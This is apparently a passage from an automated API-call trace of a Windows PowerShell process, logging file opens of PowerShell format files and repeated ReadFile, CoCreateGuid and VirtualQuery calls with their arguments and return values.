	[0061.981] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x690
	[0061.982] GetFileType (hFile=0x690) returned 0x1
	[0061.982] SetErrorMode (uMode=0x8001) returned 0x1
	[0061.982] GetFileType (hFile=0x690) returned 0x1
	[0061.982] ReadFile (in: hFile=0x690, lpBuffer=0x233e4ab1540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4ab1540*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0061.984] ReadFile (in: hFile=0x690, lpBuffer=0x233e4ab1540, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4ab1540*, lpNumberOfBytesRead=0x350027a518*=0xd6, lpOverlapped=0x0) returned 1
	[0061.985] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x245e725f, Data2=0xac7a, Data3=0x4190, Data4=([0]=0xa2, [1]=0xa8, [2]=0x31, [3]=0xce, [4]=0x33, [5]=0x75, [6]=0x84, [7]=0x91))) returned 0x0
	[0061.986] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xb511970c, Data2=0xdec, Data3=0x41ae, Data4=([0]=0xa1, [1]=0x12, [2]=0x4, [3]=0x5b, [4]=0x18, [5]=0xf0, [6]=0x8b, [7]=0x73))) returned 0x0
	[0061.988] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x60793561, Data2=0xf2e7, Data3=0x4835, Data4=([0]=0xad, [1]=0x92, [2]=0xe0, [3]=0x96, [4]=0x4a, [5]=0x4c, [6]=0x3f, [7]=0xa3))) returned 0x0
	[0061.988] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x20c56683, Data2=0xc54, Data3=0x4a4a, Data4=([0]=0xb5, [1]=0xca, [2]=0xc2, [3]=0x16, [4]=0x0, [5]=0x57, [6]=0xd6, [7]=0xb6))) returned 0x0
	[0061.988] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x8ae6bba1, Data2=0x956f, Data3=0x4bba, Data4=([0]=0xa7, [1]=0x70, [2]=0xa0, [3]=0x9b, [4]=0xc8, [5]=0x45, [6]=0xee, [7]=0xc0))) returned 0x0
	[0061.989] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xd3fd8cd4, Data2=0x3c69, Data3=0x437f, Data4=([0]=0xbe, [1]=0x93, [2]=0x69, [3]=0x32, [4]=0x9c, [5]=0x92, [6]=0xde, [7]=0x25))) returned 0x0
	[0062.009] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.009] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x690
	[0062.009] GetFileType (hFile=0x690) returned 0x1
	[0062.009] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.009] GetFileType (hFile=0x690) returned 0x1
	[0062.009] ReadFile (in: hFile=0x690, lpBuffer=0x233e4adeff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4adeff0*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.012] ReadFile (in: hFile=0x690, lpBuffer=0x233e4adeff0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4adeff0*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.100] VirtualQuery (in: lpAddress=0x279040, lpBuffer=0x3500279f00, dwLength=0x30 | out: lpBuffer=0x3500279f00*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.101] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xf9019415, Data2=0xa2de, Data3=0x4a56, Data4=([0]=0x95, [1]=0xd3, [2]=0x73, [3]=0x3a, [4]=0x83, [5]=0x55, [6]=0x1c, [7]=0xc9))) returned 0x0
	[0062.101] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x40a00efc, Data2=0xd15a, Data3=0x4e28, Data4=([0]=0x8c, [1]=0xde, [2]=0x70, [3]=0x90, [4]=0xd, [5]=0x19, [6]=0xeb, [7]=0x87))) returned 0x0
	[0062.102] VirtualQuery (in: lpAddress=0x2791f0, lpBuffer=0x350027a0b0, dwLength=0x30 | out: lpBuffer=0x350027a0b0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.102] VirtualQuery (in: lpAddress=0x2791f0, lpBuffer=0x350027a0b0, dwLength=0x30 | out: lpBuffer=0x350027a0b0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.103] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xc2f350ef, Data2=0xed97, Data3=0x46e6, Data4=([0]=0x8b, [1]=0x74, [2]=0xf2, [3]=0x29, [4]=0xa0, [5]=0x48, [6]=0x9a, [7]=0xe5))) returned 0x0
	[0062.104] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x3418a817, Data2=0x5f23, Data3=0x4798, Data4=([0]=0xa3, [1]=0xae, [2]=0xd2, [3]=0xc1, [4]=0x46, [5]=0x10, [6]=0xf0, [7]=0x63))) returned 0x0
	[0062.104] VirtualQuery (in: lpAddress=0x279440, lpBuffer=0x350027a300, dwLength=0x30 | out: lpBuffer=0x350027a300*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.104] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.104] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.105] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xc404be3b, Data2=0xda6f, Data3=0x45b7, Data4=([0]=0xa0, [1]=0xf4, [2]=0x92, [3]=0xce, [4]=0xbb, [5]=0x39, [6]=0xd5, [7]=0x2c))) returned 0x0
	[0062.105] VirtualQuery (in: lpAddress=0x279440, lpBuffer=0x350027a300, dwLength=0x30 | out: lpBuffer=0x350027a300*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.105] VirtualQuery (in: lpAddress=0x279260, lpBuffer=0x350027a120, dwLength=0x30 | out: lpBuffer=0x350027a120*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.106] VirtualQuery (in: lpAddress=0x278ab0, lpBuffer=0x3500279970, dwLength=0x30 | out: lpBuffer=0x3500279970*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.106] VirtualQuery (in: lpAddress=0x278ab0, lpBuffer=0x3500279970, dwLength=0x30 | out: lpBuffer=0x3500279970*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.106] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x7dd4b943, Data2=0xe4b2, Data3=0x4c42, Data4=([0]=0x8f, [1]=0xb3, [2]=0x4c, [3]=0x17, [4]=0xd3, [5]=0x24, [6]=0x30, [7]=0xb5))) returned 0x0
	[0062.107] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x9833d52b, Data2=0x13ab, Data3=0x4896, Data4=([0]=0x98, [1]=0xcf, [2]=0x9e, [3]=0xee, [4]=0x4, [5]=0x8, [6]=0x57, [7]=0x13))) returned 0x0
	[0062.107] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.107] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.107] GetFileType (hFile=0x690) returned 0x1
	[0062.108] ReadFile (in: hFile=0x690, lpBuffer=0x233e4b76b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4b76b60*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.122] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x4466b31c, Data2=0xfc50, Data3=0x4212, Data4=([0]=0xa8, [1]=0xb5, [2]=0xa4, [3]=0x18, [4]=0xdf, [5]=0x43, [6]=0xde, [7]=0xc4))) returned 0x0
	[0062.123] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x6177723e, Data2=0xffad, Data3=0x416a, Data4=([0]=0xb1, [1]=0x6b, [2]=0x64, [3]=0xfc, [4]=0x42, [5]=0x43, [6]=0x62, [7]=0xe0))) returned 0x0
	[0062.123] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x330f84d5, Data2=0xea36, Data3=0x447b, Data4=([0]=0xad, [1]=0x37, [2]=0x32, [3]=0x22, [4]=0x44, [5]=0x80, [6]=0x7f, [7]=0x99))) returned 0x0
	[0062.123] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x6895e1d9, Data2=0xdbf5, Data3=0x4850, Data4=([0]=0x8b, [1]=0x9a, [2]=0x63, [3]=0x1e, [4]=0x8d, [5]=0x6d, [6]=0xc3, [7]=0x1d))) returned 0x0
	[0062.123] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x84d93fe3, Data2=0x701c, Data3=0x4a39, Data4=([0]=0x84, [1]=0xb1, [2]=0xd5, [3]=0x5f, [4]=0x36, [5]=0x14, [6]=0x26, [7]=0xdc))) returned 0x0
	[0062.124] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xa5ba573a, Data2=0xea7b, Data3=0x4fb8, Data4=([0]=0xa1, [1]=0xb1, [2]=0xbf, [3]=0xcb, [4]=0x7d, [5]=0x8b, [6]=0x81, [7]=0xd9))) returned 0x0
	[0062.124] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.124] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x82e4c9ac, Data2=0x3f55, Data3=0x4e05, Data4=([0]=0x8b, [1]=0x84, [2]=0x90, [3]=0x20, [4]=0xea, [5]=0xc6, [6]=0xba, [7]=0x52))) returned 0x0
	[0062.124] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.125] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.125] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xd14dfd46, Data2=0x49c, Data3=0x4316, Data4=([0]=0xa1, [1]=0xf7, [2]=0x29, [3]=0xe2, [4]=0xc8, [5]=0x54, [6]=0x33, [7]=0xca))) returned 0x0
	[0062.125] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x7eeabed, Data2=0x87e6, Data3=0x49c3, Data4=([0]=0xad, [1]=0xcf, [2]=0x5e, [3]=0x6, [4]=0x60, [5]=0xf5, [6]=0xbe, [7]=0x19))) returned 0x0
	[0062.126] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xedb37fc0, Data2=0xa636, Data3=0x4ad6, Data4=([0]=0xbc, [1]=0x64, [2]=0x4e, [3]=0x10, [4]=0x74, [5]=0x5a, [6]=0x4f, [7]=0x63))) returned 0x0
	[0062.126] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x78672e0, Data2=0xa196, Data3=0x4b0d, Data4=([0]=0xa2, [1]=0xf2, [2]=0x85, [3]=0x95, [4]=0xea, [5]=0x8c, [6]=0xed, [7]=0x59))) returned 0x0
	[0062.126] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.126] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x379a5ebf, Data2=0xba21, Data3=0x4172, Data4=([0]=0xac, [1]=0x9e, [2]=0xe6, [3]=0x7a, [4]=0xdf, [5]=0x99, [6]=0xab, [7]=0x25))) returned 0x0
	[0062.127] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.127] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.127] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.128] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.128] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.129] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x4e38130c, Data2=0x1d64, Data3=0x4539, Data4=([0]=0xbd, [1]=0x3d, [2]=0x9, [3]=0x3, [4]=0xfd, [5]=0x78, [6]=0x8b, [7]=0xe3))) returned 0x0
	[0062.129] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.129] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.130] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.130] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x51639529, Data2=0x8d08, Data3=0x4614, Data4=([0]=0xa5, [1]=0x9d, [2]=0xdf, [3]=0xfd, [4]=0xe7, [5]=0x88, [6]=0xc9, [7]=0xe7))) returned 0x0
	[0062.130] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x40c89275, Data2=0xb436, Data3=0x4485, Data4=([0]=0xb2, [1]=0xe9, [2]=0x62, [3]=0xed, [4]=0x1d, [5]=0x62, [6]=0x1, [7]=0x4f))) returned 0x0
	[0062.131] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x58582b85, Data2=0x407b, Data3=0x4eee, Data4=([0]=0x94, [1]=0x3d, [2]=0x79, [3]=0x4f, [4]=0x1, [5]=0x8a, [6]=0x97, [7]=0xbf))) returned 0x0
	[0062.131] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x34f1291f, Data2=0xee34, Data3=0x490b, Data4=([0]=0x9d, [1]=0x89, [2]=0xc5, [3]=0x92, [4]=0x67, [5]=0x47, [6]=0xc5, [7]=0x49))) returned 0x0
	[0062.131] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xf93a15c0, Data2=0xeb1c, Data3=0x4b72, Data4=([0]=0x92, [1]=0xc7, [2]=0xcb, [3]=0x8e, [4]=0xb6, [5]=0xe2, [6]=0x99, [7]=0x3a))) returned 0x0
	[0062.131] VirtualQuery (in: lpAddress=0x279440, lpBuffer=0x350027a300, dwLength=0x30 | out: lpBuffer=0x350027a300*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.132] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x61385d0, Data2=0x73da, Data3=0x495b, Data4=([0]=0xac, [1]=0x80, [2]=0xc7, [3]=0xe7, [4]=0x8, [5]=0x3e, [6]=0x59, [7]=0xa2))) returned 0x0
	[0062.132] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x9449864b, Data2=0x960f, Data3=0x4ae0, Data4=([0]=0x9a, [1]=0xea, [2]=0xf7, [3]=0x8a, [4]=0x90, [5]=0x7d, [6]=0xe3, [7]=0x1a))) returned 0x0
	[0062.133] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xc5ab728a, Data2=0x5f16, Data3=0x4f59, Data4=([0]=0x86, [1]=0xb7, [2]=0x89, [3]=0x0, [4]=0x5e, [5]=0x88, [6]=0x6a, [7]=0x4d))) returned 0x0
	[0062.133] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x546316f3, Data2=0xd5cc, Data3=0x4b25, Data4=([0]=0x88, [1]=0x78, [2]=0x56, [3]=0x77, [4]=0x34, [5]=0x1f, [6]=0xc4, [7]=0x78))) returned 0x0
	[0062.133] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x26f539ac, Data2=0x3510, Data3=0x4995, Data4=([0]=0xb9, [1]=0x53, [2]=0xe2, [3]=0x35, [4]=0xb2, [5]=0x54, [6]=0x3f, [7]=0xef))) returned 0x0
	[0062.133] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xec6ddce7, Data2=0xd91b, Data3=0x4d38, Data4=([0]=0x97, [1]=0xe6, [2]=0x94, [3]=0x26, [4]=0xe5, [5]=0xcc, [6]=0xd7, [7]=0x41))) returned 0x0
	[0062.134] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xb58d8ab9, Data2=0x2ef1, Data3=0x4763, Data4=([0]=0x93, [1]=0x4d, [2]=0xd0, [3]=0xc3, [4]=0xa4, [5]=0x9a, [6]=0x8a, [7]=0xb8))) returned 0x0
	[0062.134] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x4b3c2c45, Data2=0xacbc, Data3=0x44f6, Data4=([0]=0x91, [1]=0x43, [2]=0x49, [3]=0x7d, [4]=0xb8, [5]=0xd2, [6]=0xa2, [7]=0x85))) returned 0x0
	[0062.134] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x3a010aec, Data2=0xa483, Data3=0x47e3, Data4=([0]=0xa9, [1]=0xb5, [2]=0x95, [3]=0x27, [4]=0x43, [5]=0x13, [6]=0xfc, [7]=0x73))) returned 0x0
	[0062.134] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x3f33e6d5, Data2=0x517e, Data3=0x42b4, Data4=([0]=0x8e, [1]=0xaf, [2]=0x1, [3]=0x53, [4]=0x5f, [5]=0xb, [6]=0xf0, [7]=0xa0))) returned 0x0
	[0062.135] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x6e4da883, Data2=0x6e30, Data3=0x4153, Data4=([0]=0xbc, [1]=0xa7, [2]=0xa0, [3]=0x57, [4]=0x16, [5]=0x90, [6]=0x77, [7]=0xa4))) returned 0x0
	[0062.135] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xe17a0750, Data2=0x6b8f, Data3=0x403c, Data4=([0]=0xae, [1]=0xf8, [2]=0xc8, [3]=0xc1, [4]=0x3, [5]=0x44, [6]=0x4b, [7]=0xe0))) returned 0x0
	[0062.135] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x261b4bf1, Data2=0x82dc, Data3=0x47a6, Data4=([0]=0xa3, [1]=0x2b, [2]=0xd9, [3]=0xcf, [4]=0x99, [5]=0x3, [6]=0xe7, [7]=0x38))) returned 0x0
	[0062.135] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xbd4f8e68, Data2=0x920a, Data3=0x43f5, Data4=([0]=0x9f, [1]=0x6b, [2]=0x19, [3]=0x53, [4]=0x8b, [5]=0x4f, [6]=0xd0, [7]=0x19))) returned 0x0
	[0062.136] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xad0bfee7, Data2=0x2f62, Data3=0x4f55, Data4=([0]=0xbc, [1]=0x9f, [2]=0xcd, [3]=0x6b, [4]=0x9a, [5]=0x20, [6]=0xc6, [7]=0x4f))) returned 0x0
	[0062.136] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x9c051e92, Data2=0xcdf5, Data3=0x4145, Data4=([0]=0x9d, [1]=0x6, [2]=0x77, [3]=0xd5, [4]=0x24, [5]=0x9d, [6]=0xb9, [7]=0x23))) returned 0x0
	[0062.136] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x926f1562, Data2=0x9567, Data3=0x4437, Data4=([0]=0x8c, [1]=0x46, [2]=0xbd, [3]=0xe8, [4]=0xc2, [5]=0x9f, [6]=0xe1, [7]=0x2a))) returned 0x0
	[0062.136] VirtualQuery (in: lpAddress=0x279440, lpBuffer=0x350027a300, dwLength=0x30 | out: lpBuffer=0x350027a300*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.137] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xef72e0b4, Data2=0x279e, Data3=0x414d, Data4=([0]=0xb6, [1]=0xe8, [2]=0x6b, [3]=0x1c, [4]=0xca, [5]=0x33, [6]=0x66, [7]=0xe3))) returned 0x0
	[0062.137] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xc8798909, Data2=0x78e4, Data3=0x40c7, Data4=([0]=0x96, [1]=0xc5, [2]=0x4a, [3]=0x38, [4]=0x75, [5]=0x5b, [6]=0x4e, [7]=0xdc))) returned 0x0
	[0062.137] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x2dd22f84, Data2=0xaa3c, Data3=0x4e89, Data4=([0]=0x8b, [1]=0xb5, [2]=0xe0, [3]=0x7e, [4]=0x1a, [5]=0x76, [6]=0x94, [7]=0x18))) returned 0x0
	[0062.137] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xcd582bdc, Data2=0x6ab7, Data3=0x4f31, Data4=([0]=0x8c, [1]=0x72, [2]=0x6f, [3]=0xb4, [4]=0xb1, [5]=0xf3, [6]=0x63, [7]=0xb2))) returned 0x0
	[0062.138] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.138] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.139] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.160] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xf40b127d, Data2=0x272b, Data3=0x4e78, Data4=([0]=0xb0, [1]=0x42, [2]=0x9c, [3]=0x63, [4]=0x82, [5]=0xc3, [6]=0x4c, [7]=0xed))) returned 0x0
	[0062.160] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.160] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
